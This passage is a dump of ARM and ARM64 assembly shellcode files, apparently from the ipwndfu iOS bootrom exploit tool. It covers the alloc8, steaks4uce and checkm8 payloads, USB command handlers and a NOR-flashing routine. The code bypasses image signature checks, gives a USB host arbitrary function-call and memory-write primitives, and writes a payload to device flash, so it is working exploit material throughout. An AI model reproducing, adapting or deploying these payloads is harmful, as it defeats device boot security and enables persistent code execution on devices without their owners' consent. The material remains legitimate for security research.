BLX R3 @ free(gLeakingDFUBuffer)
MOV R0, #0
STR R0, [R5] @ gLeakingDFUBuffer = 0
CMP R4, #0
BLT pwned_dfu_loop @ if (R4 < 0) goto pwned_dfu_loop
LDR R5, =LOAD_ADDRESS
LDR R0, [R5] @ R0 = LOAD_ADDRESS[0]
LDR R1, =EXEC_MAGIC
CMP R0, R1
BEQ pwned_dfu_exec_magic @ if (R0 == EXEC_MAGIC) goto pwned_dfu_exec_magic
LDR R0, =LOAD_ADDRESS
MOV R1, R4
MOV R2, #0
LDR R3, =memz_create
BLX R3
MOV R4, R0 @ R4 = memz_create(LOAD_ADDRESS, R4, 0)
CBZ R4, pwned_dfu_loop_end @ if (R4 == 0) goto pwned_dfu_loop_end
STR R5, [SP] @ SP[0] = LOAD_ADDRESS
STR R4, [SP, #4] @ SP[1] = R4
MOV R1, SP
ADD R2, SP, #4
BL image3_load_no_signature_check @ R0 = image3_load_no_signature_check(R0, &SP[0], &SP[1])
CBNZ R0, pwned_dfu_load_failed @ if (R0 != 0) goto pwned_dfu_load_failed
LDR R1, =LOAD_ADDRESS
MOV R2, #0
LDR R3, =jump_to
BLX R3 @ jump_to(0, LOAD_ADDRESS, 0)
/* jump_to should never return */
pwned_dfu_load_failed:
MOV R0, R4
LDR R3, =memz_destroy
BLX R3 @ memz_destroy(R4)
pwned_dfu_loop_end:
B pwned_dfu_loop @ goto pwned_dfu_loop
pwned_dfu_exec_magic:
LDR R0, [R5, #0x8] @ R0 = LOAD_ADDRESS[2] /* arg1 */
LDR R1, [R5, #0xC] @ R1 = LOAD_ADDRESS[3] /* arg2 */
LDR R2, [R5, #0x10] @ R2 = LOAD_ADDRESS[4] /* arg3 */
LDR R3, [R5, #0x14] @ R3 = LOAD_ADDRESS[5] /* arg4 */
LDR R4, [R5, #0x18] /* TODO: Consider replacing with memmove? */
STR R4, [SP] @ SP[0] = LOAD_ADDRESS[6] /* arg5 */
LDR R4, [R5, #0x1C]
STR R4, [SP, #0x4] @ SP[1] = LOAD_ADDRESS[7] /* arg6 */
LDR R4, [R5, #0x20]
STR R4, [SP, #0x8] @ SP[2] = LOAD_ADDRESS[8] /* arg7 */
LDR R4, [R5, #0x4]
BLX R4 @ R0 = LOAD_ADDRESS[1](R0, R1, R2, R3, SP[0], SP[1], SP[2])
STR R0, [R5, #4] @ LOAD_ADDRESS[1] = R0
MOV R0, #0
STR R0, [R5] @ LOAD_ADDRESS[0] = 0
B pwned_dfu_loop @ goto pwned_dfu_loop
image3_load_no_signature_check:
PUSH {R4-R7, LR} /* TODO: Rewrite this ugly mess. */
MOV R6, R11
MOV R5, R10
MOV R4, R8
PUSH {R4-R6}
ADD R7, SP, #0x18
SUB SP, SP, #0x60
STR R2, [SP, #0x10]
MOVS R3, #0
STR R3, [SP, #0x50]
LDR R6, [R1]
MOV R10, R1
MOVS R5, R0
LDR R0, [R5, #4]
MOV R8, R0
LDR R1, =MAX_SIZE
CMP R0, R1
BGT img3_bad_size
LDR R0, [R5, #0xC]
LDR R1, =IMG3_STRUCT_MAGIC
CMP R0, R1
BNE not_nor_img3
MOV R4, R8
STR R4, [SP]
LDR R4, [R5, #0x14]
LDR R0, [R4, #8]
LDR R1, =LOAD_ADDRESS
LDR R2, [R4, #0xC]
MOVS R3, #0
LDR R4, [R0, #0x1C]
BLX R4
CMP R0, R8
BNE img3_fail
B img3_continue
not_nor_img3:
LDR R1, =MEMZ_STRUCT_MAGIC
CMP R0, R1
BNE img3_fail
img3_continue:
ADD R0, SP, #0x50
MOVS R1, R6
MOV R2, R8
MOVS R3, #0
LDR R4, =image3_create_struct
BLX R4
MOV R4, R0
CBNZ R4, img3_fail
LDR R3, =image3_load_continue
BX R3
img3_bad_size:
MOV R8, R1
img3_fail:
MOV R4, #1
LDR R3, =image3_load_fail
BX R3
.align 2
PWND_STRING:
.ascii " PWND:[alloc8]\x00"
|
n1z19/ipwndfu | 8,151 | src/steaks4uce-shellcode.S | @ steaks4uce-shellcode.S
@ Author: axi0mX
@ Shellcode for steaks4uce exploit with minor improvements:
@ * reports PWND:[steaks4uce] in USB serial number string
.text
.pool
.set clean_data_cache, 0xBAD0000a
.set invalidate_instruction_cache, 0xBAD00006
.set usb_shutdown, 0xBAD00005
.set free, 0xBAD00011
.set memz_create, 0xBAD00013
.set memz_destroy, 0xBAD00015
.set image3_create_struct, 0xBAD00018
.set image3_load_continue, 0xBAD00019
.set image3_load_fail, 0xBAD0001a
.set usb_wait_for_image, 0xBAD0000d
.set jump_to, 0xBAD00014
.set nor_power_on, 0xBAD00002
.set nor_init, 0xBAD00003
.set usb_destroy, 0xBAD00004
.set memmove, 0xBAD00009
.set strlcat, 0xBAD0000c
.set gLeakingDFUBuffer, 0xBAD00010
.set gVersionString, 0xBAD0000b
.set RELOCATE_SHELLCODE_ADDRESS, 0xBAD00007
.set RELOCATE_SHELLCODE_SIZE, 0xBAD00008
.set MAIN_STACK_ADDRESS, 0xBAD00001
.set LOAD_ADDRESS, 0xBAD0000e
.set MAX_SIZE, 0xBAD0000f
.set EXEC_MAGIC, 0xBAD00012
.set IMAGE3_LOAD_SP_OFFSET, 0xBAD00016
.set IMAGE3_LOAD_STRUCT_OFFSET, 0xBAD00017
.global _start
.code 16
_start:
B pwned_dfu_start @ goto pwned_dfu_start
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
pwned_dfu_start:
LDR R0, =MAIN_STACK_ADDRESS
MOV SP, R0 @ SP = MAIN_STACK_ADDRESS
MOV R0, #1
MOV R1, #1
MOV R2, #0
LDR R3, =nor_power_on
BLX R3 @ nor_power_on(1, 1, 0)
MOV R0, #0
LDR R3, =nor_init
BLX R3 @ nor_init(0)
LDR R3, =usb_destroy
BLX R3 @ usb_destroy()
LDR R3, =usb_shutdown
BLX R3 @ usb_shutdown()
LDR R3, =invalidate_instruction_cache
BLX R3 @ invalidate_instruction_cache()
relocate_shellcode:
MOV R1, PC
SUB R1, R1, #4 @ R1 = PC - 4
LDR R0, =RELOCATE_SHELLCODE_ADDRESS
CMP R0, R1
BEQ pwned_dfu_loop @ if (R1 == RELOCATE_SHELLCODE_ADDRESS) goto pwned_dfu_loop
LDR R2, =RELOCATE_SHELLCODE_SIZE
LDR R3, =memmove
BLX R3 @ memmove(RELOCATE_SHELLCODE_ADDRESS, R1, RELOCATE_SHELLCODE_SIZE)
LDR R3, =RELOCATE_SHELLCODE_ADDRESS
ADD R3, R3, #1
BX R3 @ goto (RELOCATE_SHELLCODE_ADDRESS + 1)
pwned_dfu_loop:
LDR R3, =clean_data_cache
BLX R3 @ clean_data_cache()
LDR R0, =gVersionString
ADR R1, PWND_STRING
MOV R2, #40
LDR R3, =strlcat /* TODO: do this in a more reasonable way */
BLX R3 @ strlcat(gVersionString, PWND_STRING, 40)
LDR R3, =usb_wait_for_image
LDR R0, =LOAD_ADDRESS
LDR R1, =MAX_SIZE
BLX R3 @ R0 = usb_wait_for_image(LOAD_ADDRESS, MAX_SIZE)
MOV R4, R0 @ R4 = R0
LDR R1, =gLeakingDFUBuffer
LDR R0, [R1] @ R0 = gLeakingDFUBuffer
MOV R2, #0
STR R2, [R1] @ gLeakingDFUBuffer = 0
LDR R3, =free
BLX R3 @ free(R0)
CMP R4, #0
BLT pwned_dfu_loop @ if (R4 < 0) goto pwned_dfu_loop
LDR R5, =LOAD_ADDRESS
LDR R0, [R5] @ R0 = LOAD_ADDRESS[0]
LDR R1, =EXEC_MAGIC
CMP R0, R1
BNE pwned_dfu_not_exec_magic @ if (R0 != EXEC_MAGIC) goto pwned_dfu_not_exec_magic
LDR R0, [R5, #0x8] @ R0 = LOAD_ADDRESS[2] /* arg1 */
LDR R1, [R5, #0xC] @ R1 = LOAD_ADDRESS[3] /* arg2 */
LDR R2, [R5, #0x10] @ R2 = LOAD_ADDRESS[4] /* arg3 */
LDR R3, [R5, #0x14] @ R3 = LOAD_ADDRESS[5] /* arg4 */
LDR R4, [R5, #0x18]
STR R4, [SP] @ SP[0] = LOAD_ADDRESS[6] /* arg5 */
LDR R4, [R5, #0x1C]
STR R4, [SP, #0x4] @ SP[1] = LOAD_ADDRESS[7] /* arg6 */
LDR R4, [R5, #0x20]
STR R4, [SP, #0x8] @ SP[2] = LOAD_ADDRESS[8] /* arg7 */
LDR R4, [R5, #0x4]
BLX R4 @ R0 = LOAD_ADDRESS[1](R0, R1, R2, R3, SP[0], SP[1], SP[2])
STR R0, [R5, #4] @ LOAD_ADDRESS[1] = R0
MOV R1, #0
STR R1, [R5] @ LOAD_ADDRESS[0] = 0
B pwned_dfu_loop @ goto pwned_dfu_loop
pwned_dfu_not_exec_magic:
LDR R0, =LOAD_ADDRESS
MOV R1, R4
MOV R2, #0
LDR R3, =memz_create
BLX R3 @ R0 = memz_create(LOAD_ADDRESS, R4, 0)
CMP R0, #0
BEQ pwned_dfu_loop @ if (R0 == 0) goto pwned_dfu_loop /* out of memory :-| */
LDR R3, =LOAD_ADDRESS
STR R3, [SP] @ SP[0] = LOAD_ADDRESS
STR R4, [SP, #4] @ SP[1] = R4
MOV R4, R0 @ R4 = R0
MOV R1, SP
ADD R2, SP, #4
BL image3_load_no_signature_check @ R0 = image3_load_no_signature_check(R0, &SP[0], &SP[1])
CMP R0, #0
BNE load_failed @ if (R0 != 0) goto load_failed
LDR R1, =LOAD_ADDRESS
MOV R2, #0
LDR R3, =jump_to
BLX R3 @ jump_to(0, LOAD_ADDRESS, 0)
/* jump_to should never return */
load_failed:
MOV R0, R4
LDR R3, =memz_destroy
BLX R3 @ memz_destroy(R4)
B pwned_dfu_loop @ goto pwned_dfu_loop
image3_load_no_signature_check:
PUSH {R4-R7, LR} @ push_registers(R4, R5, R6, R7, LR)
MOV R6, R11
MOV R5, R10
MOV R4, R8
PUSH {R4-R6} @ push_registers(R8, R10, R11)
ADD R7, SP, #0x18 @ R7 = SP - 0x18
LDR R4, =IMAGE3_LOAD_SP_OFFSET
MOV R5, SP
SUB R5, R5, R4
MOV SP, R5 @ SP = SP - IMAGE3_LOAD_SP_OFFSET
MOV R3, #0
LDR R4, =IMAGE3_LOAD_STRUCT_OFFSET
ADD R4, R5, R4
STR R3, [R4] @ *(SP + IMAGE3_LOAD_STRUCT_OFFSET) = 0
STR R2, [SP, #0x10] @ SP[4] = R2
STR R1, [SP, #0x14] @ SP[5] = R1
STR R3, [SP, #0x18] @ SP[6] = 0
LDR R6, [R1] @ R6 = *R1
MOV R10, R1 @ R10 = R1
MOV R11, R3 @ R11 = 0
LDR R1, =MAX_SIZE
MOV R8, R1 @ R8 = MAX_SIZE
LDR R2, [R0, #4]
CMP R2, R1
BGT img3_fail @ if (R0[1] > MAX_SIZE) goto img3_fail
MOV R8, R2 @ R8 = R0[1]
MOV R0, R4
MOV R1, R6
LDR R4, =image3_create_struct
BLX R4
MOV R4, R0 @ R4 = image3_create_struct(SP + IMAGE3_LOAD_STRUCT_OFFSET, R6, R8, 0)
LDR R3, =image3_load_continue @ R3 = image3_load_continue
CMP R4, #0
BEQ img3_branch_R3 @ if (R4 == 0) goto img3_branch_R3
img3_fail:
MOV R4, #1 @ R4 = 1
LDR R3, =image3_load_fail @ R3 = image3_load_fail
img3_branch_R3:
BX R3 @ goto R3
.align 2
PWND_STRING:
.ascii "] PWND:[steaks4uce\x00"
|
n1z19/ipwndfu | 3,423 | src/usb_0xA1_2_arm64.S | .text
.pool
.set USB_CORE_DO_IO, 0xBAD00006
.set LOAD_ADDRESS, 0xBAD00001
.set EXEC_MAGIC, 0xBAD00002
.set MEMC_MAGIC, 0xBAD00004
.set MEMS_MAGIC, 0xBAD00005
.set DONE_MAGIC, 0xBAD00003
.global _main
_main:
jump_back:
BRK #1
BRK #1
LDRH W2, [X0]
CMP W2, #0x2A1
BNE jump_back
STP X29, X30, [SP,#-0x10]!
MOV X29, SP
STP X20, X19, [SP,#-0x10]!
MOV X19, X0
LDR X20, =LOAD_ADDRESS
MOV W1, #0xFFFF
LDRH W2, [X19,#2]
CMP W1, W2
BNE request_done
LDR X0, [X20] ; X0 = LOAD_ADDRESS[0]
LDR X1, =EXEC_MAGIC
CMP X0, X1
BNE not_exec ; if (X0 != EXEC_MAGIC) goto not_exec
STR XZR, [X20] ; LOAD_ADDRESS[0] = 0
LDR X0, [X20, #0x10] ; X0 = LOAD_ADDRESS[2] /* arg1 */
LDR X1, [X20, #0x18] ; X1 = LOAD_ADDRESS[3] /* arg2 */
LDR X2, [X20, #0x20] ; X2 = LOAD_ADDRESS[4] /* arg3 */
LDR X3, [X20, #0x28] ; X3 = LOAD_ADDRESS[5] /* arg4 */
LDR X4, [X20, #0x30] ; X4 = LOAD_ADDRESS[6] /* arg5 */
LDR X5, [X20, #0x38] ; X5 = LOAD_ADDRESS[7] /* arg6 */
LDR X6, [X20, #0x40] ; X6 = LOAD_ADDRESS[8] /* arg7 */
LDR X7, [X20, #0x40] ; X7 = LOAD_ADDRESS[9] /* arg8 */
LDR X8, [X20, #0x8]
BLR X8 ; X0 = LOAD_ADDRESS[1](X0, X1, X2, X3, X4, X5, X6, X7)
LDR X8, =DONE_MAGIC
STP X8, X0, [X20] ; LOAD_ADDRESS[0,1] = DONE_MAGIC, X0
B request_done
not_exec:
LDR X1, =MEMC_MAGIC
CMP X0, X1
BNE not_memc
STR XZR, [X20]
LDP X0, X1, [X20, #0x10]
LDR X2, [X20, #0x20]
BL memcpy
LDR X8, =DONE_MAGIC
STR X8, [X20]
B request_done
not_memc:
LDR X1, =MEMS_MAGIC
CMP X0, X1
BNE request_done
STR XZR, [X20]
LDP X0, X1, [X20, #0x10]
LDR X2, [X20, #0x20]
BL memset
LDR X8, =DONE_MAGIC
STR X8, [X20]
B request_done
request_done:
MOV W0, #0x80
MOV X1, X20
LDRH W2, [X19,#6]
MOV X3, #0
LDR X4, =USB_CORE_DO_IO
BLR X4
MOV W0, #0
LDP X20, X19, [SP],#0x10
LDP X29, X30, [SP],#0x10
RET
memset:
MOV X3, #0x101010101010101
AND X1, X1, #0xFF
MUL X1, X1, X3
MOV X3, X0
memset_8:
CMP X2, #8
B.CC memset_4
STR X1, [X0]
ADD X0, X0, #8
SUB X2, X2, #8
B memset_8
memset_4:
CMP X2, #4
B.CC memset_2
STR W1, [X0]
ADD X0, X0, #4
SUB X2, X2, #4
memset_2:
CMP X2, #2
B.CC memset_1
STR W1, [X0]
ADD X0, X0, #2
SUB X2, X2, #2
memset_1:
CBZ X2, memset_done
STR W1, [X0]
ADD X0, X0, #1
SUB X2, X2, #1
memset_done:
MOV X0, X3
RET
memcpy:
MOV X4, X0
memcpy_8:
CMP X2, #8
B.CC memcpy_4
LDR X3, [X1]
STR X3, [X0]
ADD X0, X0, #8
ADD X1, X1, #8
SUB X2, X2, #8
B memcpy_8
memcpy_4:
CMP X2, #4
B.CC memcpy_2
LDR W3, [X1]
STR W3, [X0]
ADD X0, X0, #4
ADD X1, X1, #4
SUB X2, X2, #4
memcpy_2:
CMP X2, #2
B.CC memcpy_1
LDRH W3, [X1]
STRH W3, [X0]
ADD X0, X0, #2
ADD X1, X1, #2
SUB X2, X2, #2
memcpy_1:
CBZ X2, memcpy_done
LDRB W3, [X1]
STRB W3, [X0]
ADD X0, X0, #1
ADD X1, X1, #1
SUB X2, X2, #1
memcpy_done:
MOV X0, X4
RET
|
n1z19/ipwndfu | 2,701 | src/ibss-flash-nor-shellcode.S | @ ibss-flash-nor-shellcode.S
@ Author: axi0mX
@ Flashes parts of payload to NOR using iPhone2,1 4.3.5 iBSS
@ Parts flashed: 0x0-0x200, 0x8000-0xF3000
.text
.pool
.set reboot_cmd, 0x84000cdd
.set set_bgcolor, 0x8400c6ed
.set apply_bgcolor, 0x8400c789
.set get_block_device, 0x84012c61
.set gNor0String, 0x84014754
.set NOR_PAYLOAD_BASE, 0x41000080
.set NOR_WRITE_1_OFFSET, 0
.set NOR_WRITE_1_SIZE, 0x200
.set NOR_WRITE_2_OFFSET, 0x8000
.set NOR_WRITE_2_SIZE, 0x78000
.set NOR_WRITE_3_OFFSET, 0x80000
.set NOR_WRITE_3_SIZE, 0x73000
.global _start
_start:
.code 16
MOV R0, #0
MOV R1, #160
MOV R2, #0
LDR R3, =set_bgcolor
BLX R3 @ set_bgcolor(0, 160, 0)
LDR R3, =apply_bgcolor
BLX R3 @ apply_bgcolor()
LDR R0, =NOR_WRITE_1_OFFSET
LDR R1, =NOR_WRITE_1_SIZE
BL flash_nor @ flash_nor(NOR_WRITE_1_OFFSET, NOR_WRITE_1_SIZE)
LDR R0, =NOR_WRITE_2_OFFSET
LDR R1, =NOR_WRITE_2_SIZE
BL flash_nor @ flash_nor(NOR_WRITE_2_OFFSET, NOR_WRITE_2_SIZE)
LDR R0, =NOR_WRITE_3_OFFSET
LDR R1, =NOR_WRITE_3_SIZE
BL flash_nor @ flash_nor(NOR_WRITE_3_OFFSET, NOR_WRITE_3_SIZE)
LDR R3, =reboot_cmd
BLX R3 @ reboot_cmd()
/* reboot_cmd should never return */
B spin @ goto spin
flash_nor: @ void flash_nor(R0=offset, R1=size)
PUSH {R4-R5, LR}
MOV R4, R0 @ R4 = R0
MOV R5, R1 @ R5 = R1
LDR R0, =gNor0String
LDR R3, =get_block_device
BLX R3 @ R0 = get_block_device(gNor0String)
CBZ R0, fail @ if (R0 == 0) goto fail
LDR R1, =NOR_PAYLOAD_BASE
ADD R1, R1, R4
MOV R2, R4
MOV R3, #0
STR R5, [SP]
LDR R4, [R0, #0x24]
BLX R4 @ R0 = R0[9](R0, NOR_PAYLOAD_BASE + R4, R4, 0, R5)
CMP R0, R5
BNE fail @ if (R0 != R5) goto fail
POP {R4-R5, PC} @ return
fail:
MOV R0, #255
MOV R1, #0
MOV R2, #0
LDR R3, =set_bgcolor
BLX R3 @ set_bgcolor(255, 0, 0)
LDR R3, =apply_bgcolor
BLX R3 @ apply_bgcolor()
spin:
B spin @ while (1)
|
n1z19/ipwndfu | 1,771 | src/checkm8_arm64.S | .text
.pool
.set PAYLOAD_OFFSET, 0xBAD00006
.set PAYLOAD_SIZE, 0xBAD00007
.set PAYLOAD_DEST, 0xBAD00005
.set PAYLOAD_PTR, 0xBAD00008
.set gUSBSerialNumber, 0xBAD00002
.set gUSBSRNMStringDescriptor, 0xBAD00004
.set gUSBDescriptors, 0xBAD00001
.set usb_create_string_descriptor, 0xBAD00003
.global _main
_main:
MOV X19, #0 // HACK: do not free this usb request
STP X29, X30, [SP,#-0x10]!
MOV X29, SP
LDR X0, =gUSBDescriptors
LDP X0, X1, [X0]
ADR X2, USB_DESCRIPTOR
LDP X3, X4, [X2]
STP X3, X4, [X0]
STP X3, X4, [X1]
LDP X3, X4, [X2,#0x10]
STP X3, X4, [X0,#0x10]
STP X3, X4, [X1,#0x10]
LDR X0, =gUSBSerialNumber
find_zero_loop:
ADD X0, X0, #1
LDRB W1, [X0]
CBNZ W1, find_zero_loop
ADR X1, PWND_STRING
LDP X2, X3, [X1]
STP X2, X3, [X0]
LDR X0, =gUSBSerialNumber
LDR X1, =usb_create_string_descriptor
BLR X1
LDR X1, =gUSBSRNMStringDescriptor
STRB W0, [X1]
LDR X0, =PAYLOAD_DEST
ADR X1, _main
LDR X2, =PAYLOAD_OFFSET
ADD X1, X1, X2
MOV X2, #0
LDR X3, =PAYLOAD_SIZE
LDR X4, =PAYLOAD_PTR
ADD X5, X0, #0x18
STR X5, [X4]
copy_loop:
LDP X3, X4, [X1]
STP X3, X4, [X0]
LDP X3, X4, [X1,#0x10]
STP X3, X4, [X0,#0x10]
LDP X3, X4, [X1,#0x20]
STP X3, X4, [X0,#0x20]
LDP X3, X4, [X1,#0x30]
STP X3, X4, [X0,#0x30]
DC CIVAC, X0
DMB SY
ADD X0, X0, #0x40
ADD X1, X1, #0x40
ADD X2, X2, #0x40
CMP X2, X3
B.CC copy_loop
SYS #0, c7, c5, #0
DSB SY
ISB
LDP X29, X30, [SP],#0x10
RET
USB_DESCRIPTOR:
.word 0x190209, 0x80050101, 0x409fa, 0x1fe0000, 0x21070000, 0xa01, 0x8, 0x0
PWND_STRING:
.asciz " PWND:[checkm8]"
|
n1z19/ipwndfu | 2,444 | src/usb_0xA1_2_armv7.S | .text
.pool
.set USB_CORE_DO_IO, 0xBAD00006
.set LOAD_ADDRESS, 0xBAD00001
.set EXEC_MAGIC, 0xBAD00002
.set MEMC_MAGIC, 0xBAD00004
.set MEMS_MAGIC, 0xBAD00005
.set DONE_MAGIC, 0xBAD00003
.code 16
.global _main
_main:
jump_back:
BKPT #1
BKPT #1
BKPT #1
BKPT #1
LDRH R2, [R0]
MOVW R3, #0x2A1
CMP R2, R3
BNE jump_back
PUSH {R4-R7,LR}
ADD R7, SP, #0xC
SUB SP, SP, #0x10
MOV R4, R0
LDR R5, =LOAD_ADDRESS
MOVW R1, #0xFFFF
LDRH R2, [R4,#2]
CMP R1, R2
BNE request_done
LDRD R0, R1, [R5]
LDR R2, =EXEC_MAGIC
CMP R0, R2
BNE not_exec
CMP R1, R2
BNE not_exec
MOV R1, #0
STRD R1, R1, [R5]
LDRD R0, R1, [R5, #0x20]
LDRD R2, R3, [R5, #0x28]
STRD R0, R1, [SP]
STRD R2, R3, [SP, #0x8]
LDRD R0, R1, [R5, #0x10]
LDRD R2, R3, [R5, #0x18]
LDR R6, [R5, #0x8]
BLX R6
LDR R2, =DONE_MAGIC
STRD R0, R1, [R5,#0x8]
STRD R2, R2, [R5]
not_exec:
LDR R2, =MEMC_MAGIC
CMP R0, R2
BNE not_memc
CMP R1, R2
BNE not_memc
MOV R1, #0
STRD R1, R1, [R5]
LDRD R0, R1, [R5, #0x10]
LDR R2, [R5, #0x18]
BL memcpy
LDR R2, =DONE_MAGIC
STRD R2, R2, [R5]
B request_done
not_memc:
LDR R2, =MEMS_MAGIC
CMP R0, R2
BNE request_done
CMP R1, R2
BNE request_done
MOV R1, #0
STRD R1, R1, [R5]
LDRD R0, R1, [R5, #0x10]
LDR R2, [R5, #0x18]
BL memset
LDR R2, =DONE_MAGIC
STRD R2, R2, [R5]
request_done:
MOV R0, #0x80
MOV R1, R5
LDRH R2, [R4,#6]
MOV R3, #0
LDR R4, =USB_CORE_DO_IO
BLX R4
MOV R0, #0
ADD SP, SP, #0x10
POP {R4-R7,PC}
memcpy:
CMP R2, #4
BCC memcpy_2
LDR R3, [R1]
STR R3, [R0]
ADD R0, R0, #4
ADD R1, R1, #4
SUB R2, R2, #4
B memcpy
memcpy_2:
CMP R2, #2
BCC memcpy_1
LDRH R3, [R1]
STRH R3, [R0]
ADD R0, R0, #2
ADD R1, R1, #2
SUB R2, R2, #2
memcpy_1:
CBZ R2, memcpy_done
LDRB R3, [R1]
STRB R3, [R0]
ADD R0, R0, #1
ADD R1, R1, #1
SUB R2, R2, #1
memcpy_done:
BX LR
memset:
MOV R3, #0xFF
AND R1, R1, R3
LSL R3, R1, #8
ORR R1, R1, R3
LSL R3, R1, #16
ORR R1, R1, R3
memset_4:
CMP R2, #4
BCC memset_2
STR R1, [R0]
ADD R0, R0, #4
SUB R2, R2, #4
B memset_4
memset_2:
CMP R2, #2
BCC memset_1
STRH R1, [R0]
ADD R0, R0, #2
SUB R2, R2, #2
memset_1:
CBZ R2, memset_done
STRB R1, [R0]
ADD R0, R0, #1
SUB R2, R2, #1
memset_done:
BX LR
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.